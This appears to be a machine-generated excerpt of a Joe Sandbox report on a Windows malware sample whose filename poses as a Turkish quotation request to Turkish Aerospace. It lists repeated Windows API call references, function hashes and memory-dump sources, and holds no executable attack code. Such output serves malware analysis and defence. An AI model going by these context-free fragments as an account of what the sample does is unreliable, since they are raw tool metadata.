                                                                                                                                    • Instruction ID: 8e7bf522060ad6423873bb8ebe8f3371341c8cc6f1d1bdb7c15821ece4e30e11
                                                                                                                                    • Opcode Fuzzy Hash: 37cbc6c87f93bcce17a9f7978890130130ab5909b49bfb604051525529e8e395
                                                                                                                                    • Instruction Fuzzy Hash: C9B1E134204302AFD724EF24C889E2A7BE5AF95318F54854CF4565B2E3DB71EE52CB91
                                                                                                                                    APIs
                                                                                                                                    • __allrem.LIBCMT ref: 001B00BA
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001B00D6
                                                                                                                                    • __allrem.LIBCMT ref: 001B00ED
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001B010B
                                                                                                                                    • __allrem.LIBCMT ref: 001B0122
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001B0140
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                    • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                                    • Instruction ID: 58a622e48056fdddd2172ff3c367851842538288250d9ce1b4bf6cb8d157f5ba
                                                                                                                                    • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                                    • Instruction Fuzzy Hash: D7811976A00706AFE725AF6CCC82BAB73E8AF66364F24423EF411D7681E770D9018750
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001A82D9,001A82D9,?,?,?,001B644F,00000001,00000001,8BE85006), ref: 001B6258
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001B644F,00000001,00000001,8BE85006,?,?,?), ref: 001B62DE
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001B63D8
                                                                                                                                    • __freea.LIBCMT ref: 001B63E5
                                                                                                                                      • Part of subcall function 001B3820: RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852
                                                                                                                                    • __freea.LIBCMT ref: 001B63EE
                                                                                                                                    • __freea.LIBCMT ref: 001B6413
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                    • Opcode ID: b65dfef162773b3f92fefeea10701f89858dd86208f1666086a1a3e7f42e0393
                                                                                                                                    • Instruction ID: 2db1c2ac860cc6eccba3fb0c5d0da5dcc9fc4ed298c77fbeab39539a59584557
                                                                                                                                    • Opcode Fuzzy Hash: b65dfef162773b3f92fefeea10701f89858dd86208f1666086a1a3e7f42e0393
                                                                                                                                    • Instruction Fuzzy Hash: B351E072A00216ABEB258F64DC81EEF7BA9FB64710F254669FC09D6150EB38DC50C6A0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                      • Part of subcall function 0020C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0020B6AE,?,?), ref: 0020C9B5
                                                                                                                                      • Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020C9F1
                                                                                                                                      • Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA68
                                                                                                                                      • Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA9E
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0020BCCA
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0020BD25
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0020BD6A
                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0020BD99
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0020BDF3
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0020BDFF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1120388591-0
                                                                                                                                    • Opcode ID: 56a5a32bb393433e540e4fa34053490dd9ce1129555147013617b3ace5683703
                                                                                                                                    • Instruction ID: ba778729dfb92f19cd5967fad938f55282d9ce2231d79db2f1bd0d73622d897c
                                                                                                                                    • Opcode Fuzzy Hash: 56a5a32bb393433e540e4fa34053490dd9ce1129555147013617b3ace5683703
                                                                                                                                    • Instruction Fuzzy Hash: 4A81AF30228342AFD725DF24C885E6ABBE5FF84308F14855DF4598B2A2DB31ED55CB92
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 001DF7B9
                                                                                                                                    • SysAllocString.OLEAUT32(00000001), ref: 001DF860
                                                                                                                                    • VariantCopy.OLEAUT32(001DFA64,00000000), ref: 001DF889
                                                                                                                                    • VariantClear.OLEAUT32(001DFA64), ref: 001DF8AD
                                                                                                                                    • VariantCopy.OLEAUT32(001DFA64,00000000), ref: 001DF8B1
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 001DF8BB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3859894641-0
                                                                                                                                    • Opcode ID: 20fcb0e2a605e99f956dfca69bb519ec94888be536ff3b9eb0a8d07f5cba69f1
                                                                                                                                    • Instruction ID: 34ec0e81579535ef312fca68e0a4ebeb92afbf78b319c1f96c302640d8f4d783
                                                                                                                                    • Opcode Fuzzy Hash: 20fcb0e2a605e99f956dfca69bb519ec94888be536ff3b9eb0a8d07f5cba69f1
                                                                                                                                    • Instruction Fuzzy Hash: DC51D535940310BACF18AB65D8A5B29B3A8EF55314B24846FFD07DF391DB708E42CB96
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00187620: _wcslen.LIBCMT ref: 00187625
                                                                                                                                      • Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A
                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 001F94E5
                                                                                                                                    • _wcslen.LIBCMT ref: 001F9506
                                                                                                                                    • _wcslen.LIBCMT ref: 001F952D
                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 001F9585
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                                                    • String ID: X
                                                                                                                                    • API String ID: 83654149-3081909835
                                                                                                                                    • Opcode ID: caa365af2e4947f3b6149a9831b2bab4ab122fb5b74a66e6756618521a13810e
                                                                                                                                    • Instruction ID: b48f06559b4088cd1745bd3edb8f0334ec4793a685f4f5d94ebe1c0a18994d97
                                                                                                                                    • Opcode Fuzzy Hash: caa365af2e4947f3b6149a9831b2bab4ab122fb5b74a66e6756618521a13810e
                                                                                                                                    • Instruction Fuzzy Hash: 68E1B1315083409FC724EF24C881B6AB7E0BF95314F14896DF9999B2A2DB31EE05CF92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2
                                                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00199241
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001992A5
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 001992C2
                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001992D3
                                                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00199321
                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001D71EA
                                                                                                                                      • Part of subcall function 00199339: BeginPath.GDI32(00000000), ref: 00199357
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3050599898-0
                                                                                                                                    • Opcode ID: 76d4e0c16b7404b9a658ef94df82947d7e0efff9c90c8ebcc62be8e419a4aff8
                                                                                                                                    • Instruction ID: 883a7351b43ee327f39b3f3fb35cbf818c084e99867c75948e97be464b0e33da
                                                                                                                                    • Opcode Fuzzy Hash: 76d4e0c16b7404b9a658ef94df82947d7e0efff9c90c8ebcc62be8e419a4aff8
                                                                                                                                    • Instruction Fuzzy Hash: 2D41AC70104300AFDB21DF28DC88FAA7BB8EF56321F14062DF9A5872E1D7309855DB62
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 001F080C
                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001F0847
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 001F0863
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 001F08DC
                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001F08F3
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 001F0921
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3368777196-0
                                                                                                                                    • Opcode ID: 8a9681a683984dc8f50fed458c62afa24de939e90f92fe65587e3086e25a653d
                                                                                                                                    • Instruction ID: 182811a1d8ed00296336328dc1d7a522adcb539ba9ae4b00cdd901294075d60b
                                                                                                                                    • Opcode Fuzzy Hash: 8a9681a683984dc8f50fed458c62afa24de939e90f92fe65587e3086e25a653d
                                                                                                                                    • Instruction Fuzzy Hash: BB418A75A00209EBDF15EF54DC85AAA77B8FF18300F1480A9ED04DA297DB70DE61DBA0
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,001DF3AB,00000000,?,?,00000000,?,001D682C,00000004,00000000,00000000), ref: 0021824C
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00218272
                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 002182D1
                                                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 002182E5
                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0021830B
                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0021832F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                    • Opcode ID: d06e30f76e9cc511703e5bcfe1b850fa975efd22956538f054f89f27d9c48d4b
                                                                                                                                    • Instruction ID: dfdff1449df60791ea0236087cdd1fa83f433aaaffad8d720eb868df90422f89
                                                                                                                                    • Opcode Fuzzy Hash: d06e30f76e9cc511703e5bcfe1b850fa975efd22956538f054f89f27d9c48d4b
                                                                                                                                    • Instruction Fuzzy Hash: 0E41E834611681AFDB16CF14D8D9BE47BE0FB26715F1841A8E9184F2B2CB71ACA1CF40
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 001E4C95
                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001E4CB2
                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001E4CEA
                                                                                                                                    • _wcslen.LIBCMT ref: 001E4D08
                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001E4D10
                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001E4D1A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 72514467-0
                                                                                                                                    • Opcode ID: 1c095f2e1e4201bbbee47d398478dbdf839ed8517b71fc689f35ab4ee300cddc
                                                                                                                                    • Instruction ID: 764be8ec0936618a259d6971508121cf7f213c989cab22847c3db7981d375653
                                                                                                                                    • Opcode Fuzzy Hash: 1c095f2e1e4201bbbee47d398478dbdf839ed8517b71fc689f35ab4ee300cddc
                                                                                                                                    • Instruction Fuzzy Hash: 8A21F9352046807BEB195B7AAC49EBF7B9CEFA5750F21803DF805CB191DF61DC4196A0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00183AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00183A97,?,?,00182E7F,?,?,?,00000000), ref: 00183AC2
                                                                                                                                    • _wcslen.LIBCMT ref: 001F587B
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 001F5995
                                                                                                                                    • CoCreateInstance.OLE32(0021FCF8,00000000,00000001,0021FB68,?), ref: 001F59AE
                                                                                                                                    • CoUninitialize.OLE32 ref: 001F59CC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                    • String ID: .lnk
                                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                                    • Opcode ID: cd8260e16995d41d4145de71beed8c8a75b1e9d267f5068c712c5560ebc86593
                                                                                                                                    • Instruction ID: b29c02bd8272892b7874e5e79760a93e5f8db29f901ee176668a954ec73e91ae
                                                                                                                                    • Opcode Fuzzy Hash: cd8260e16995d41d4145de71beed8c8a75b1e9d267f5068c712c5560ebc86593
                                                                                                                                    • Instruction Fuzzy Hash: 13D164746087059FC708EF24C48492ABBE2FF99714F14885DFA8A9B361DB31ED45CB92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001E0FCA
                                                                                                                                      • Part of subcall function 001E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001E0FD6
                                                                                                                                      • Part of subcall function 001E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001E0FE5
                                                                                                                                      • Part of subcall function 001E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001E0FEC
                                                                                                                                      • Part of subcall function 001E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001E1002
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,001E1335), ref: 001E17AE
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001E17BA
                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 001E17C1
                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 001E17DA
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,001E1335), ref: 001E17EE
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E17F5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                    • Opcode ID: ad92727e035891521dee94cc605e4c1aa27574187b05610d2d5040c94b2658be
                                                                                                                                    • Instruction ID: 081383d00bfb0db8140b98558fcc4a0e868ae764c7a88f5c7e85cc950340918e
                                                                                                                                    • Opcode Fuzzy Hash: ad92727e035891521dee94cc605e4c1aa27574187b05610d2d5040c94b2658be
                                                                                                                                    • Instruction Fuzzy Hash: 0D11D036980A05FFDB109FA5DC49BEF7BB9EF45755F208028F48597210CB35A940CB60
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001E14FF
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 001E1506
                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001E1515
                                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 001E1520
                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001E154F
                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 001E1563
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                    • Opcode ID: f7717f3f2512c7c3a57334ba6d7f0f5352fa1a65333e02cc6e1740f5a3cbe777
                                                                                                                                    • Instruction ID: 4515d9509672b850677129fcb97d791bf1fe365a1f995ef2b24fecb49cc7088b
                                                                                                                                    • Opcode Fuzzy Hash: f7717f3f2512c7c3a57334ba6d7f0f5352fa1a65333e02cc6e1740f5a3cbe777
                                                                                                                                    • Instruction Fuzzy Hash: 93115676504249BBDF129FA8ED49BDE7BA9EF48704F148024FA05A21A0C7718E61DB60
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(?,?,001A3379,001A2FE5), ref: 001A3390
                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001A339E
                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001A33B7
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,001A3379,001A2FE5), ref: 001A3409
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
